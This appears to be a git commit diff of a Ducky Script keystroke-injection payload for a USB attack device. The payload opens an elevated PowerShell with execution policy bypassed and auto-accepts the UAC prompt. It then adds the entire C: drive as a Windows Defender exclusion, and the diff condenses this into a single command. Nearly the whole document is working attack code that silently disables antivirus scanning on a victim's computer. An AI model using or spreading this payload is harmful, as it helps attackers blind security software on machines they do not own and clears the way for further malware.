Update Add Exclusion C-drive.txt
This commit is contained in:
@@ -9,15 +9,7 @@ DEFAULT_DELAY 100
|
|||||||
REM open powershell (remove -W Hidden to show the window).
|
REM open powershell (remove -W Hidden to show the window).
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 750
|
DELAY 750
|
||||||
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
|
STRING powershell -Exec Bypass -C Add-MpPreference -ExclusionPath C:\
|
||||||
CTRL-SHIFT ENTER
|
CTRL-SHIFT ENTER
|
||||||
DELAY 1500
|
DELAY 2500
|
||||||
ALT y
|
ALT y
|
||||||
DELAY 5000
|
|
||||||
|
|
||||||
REM add the exclusion path.
|
|
||||||
STRING Add-MpPreference -ExclusionPath C:\
|
|
||||||
ENTER
|
|
||||||
DELAY 250
|
|
||||||
STRING exit
|
|
||||||
ENTER
|
|
||||||
|
|||||||
Reference in New Issue
Block a user